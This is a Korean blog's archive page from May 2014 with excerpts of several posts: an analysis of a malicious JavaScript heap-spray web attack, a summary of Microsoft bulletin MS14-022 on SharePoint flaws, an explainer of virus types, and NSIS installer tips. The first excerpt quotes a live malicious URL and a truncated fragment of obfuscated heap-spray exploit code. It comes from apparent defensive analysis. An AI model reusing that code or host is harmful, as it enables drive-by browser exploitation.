본문 바로가기

2014/0521

Web Attack: Malicious Javascript Heap Spray Generic 공격 z-z.so/xml.php?q=1337            function Suck(dword) {                var t = unescape;                var d = Number(dword).toString(16);                while (d.length                 return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));            }           function setc() {               var Then = new Date()               Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)            .. 2014. 5. 16.
2014년 5월 MS 정기 보안업데이트 [MS14-022] Microsoft Sharepoint Server의 취약점으로 인한 원격 코드실행 문제영향 공격자가 영향 받는 시스템에 원격코드 실행설명인증된 공격자가 대상 Sharepoint 서버에 특수하게 조작된 페이지를 보내는 경우 원격 코드실행이 허용될 수 있는 취약점이 존재관련취약점 :Sharepoint 페이지 콘텐츠 취약점 – (CVE-2014-0251)Sharepoint XSS 취약점 – (CVE-2014-1754)웹 응용 프로그램 페이지 콘텐츠 취약점 – (CVE-2014-1813)영향 : 원격 코드실행중요도 : 긴급해당시스템참조사이트 참고한글 : http://technet.microsoft.com/ko-kr/security/bulletin/MS14-022영문 : http://techn.. 2014. 5. 15.
바이러스, 위험요소, 위협요소 유형 바이러스 유형바이러스는 사용자가 모르는 상태에서 또는 사용자의 허가 없이 PC의 작동 방법을 변경하도록 설계된 작은 프로그램입니다.다음을 수행하는 프로그램을 바이러스로 간주할 수 있습니다.사용자가 작업을 수행할 필요 없이 자체적으로 실행됩니다.자체 복사본을 만들어 다른 PC로 확산됩니다.모든 바이러스가 피해를 유발하는 것은 아니지만 무해한 바이러스라도 PC의 성능과 안정성에 영향을 미칠 수 있습니다.바이러스는 다음 카테고리로 분류됩니다.파일 감염프로그램 파일을 감염시킵니다. 감염된 파일이 실행되면 해당 파일에 들어있던 바이러스가 다른 프로그램 파일을 감염시킵니다.부트 바이러스PC의 시스템 영역으로 들어와서 PC를 시작하는 즉시 활성화됩니다. PC에 연결된 디스크나 다른 저장 장치를 감염시킬 수도 있습니다.. 2014. 5. 14.
NSIS로 64비트용 설치파일 만들때 팁 64비트용 프로그램을 만드셨습니까? NSIS 로 설치파일을 만드려고 하시나요? 이럴때 유용한 팁을 소개합니다. 1. UNICODE NSIS 설치 : http://www.scratchpaper.com/ WIN95/98 을 지원하지 않는다고 할때 UNICODE NSIS 를 사용하면 설치파일의 다국어 지원등에 매우 유리합니다. 물론 64비트 OS 는 전부 유니코드 지원 OS 죠. 2. Program files 폴더 nsis 에서 program files 폴더 변수는 $PROGRAMFILES 입니다. 그런데 64비트 os 에서는 $PROGRAMFILES 는 program files (x86) 이 되어 버리죠. 64비트용 프로그램을 program files 에 설치하고 싶으면 $PROGRAMFILES64 사용하면.. 2014. 5. 13.
[NSIS] 초기 설치 폴더를 유연하게 결정 깁뿔님께서도 선호하시고 사용자도 원하는 UAC 권한 상승 불필요 설치(installer) 프로그램과 관련하여 최근 제가 사용하게 된 내용을 공유합니다. 낮은(Guest) 권한의 사용자는 기본적으로 다음 항목들에 기록할 수가 없죠. C:\Program Files C:\Windows HKEY_CLASSES_ROOT HKEY_LOCAL_MACHINE 이에 반해 각 계정 사용자 폴더와 HKEY_CURRENT_USER 레지스트리는 읽기/쓰기가 가능합니다. NSIS 스크립트에서 RequestExecutionLevel 옵션을 별도로 주지 않으면 Windows(Vista/7)에서 NSIS installer를 인식하여 권한 상승이 필요하다고 간주합니다. 만약 낮은(Guest) 권한의 사용자가 Administrator 등.. 2014. 5. 13.

티스토리툴바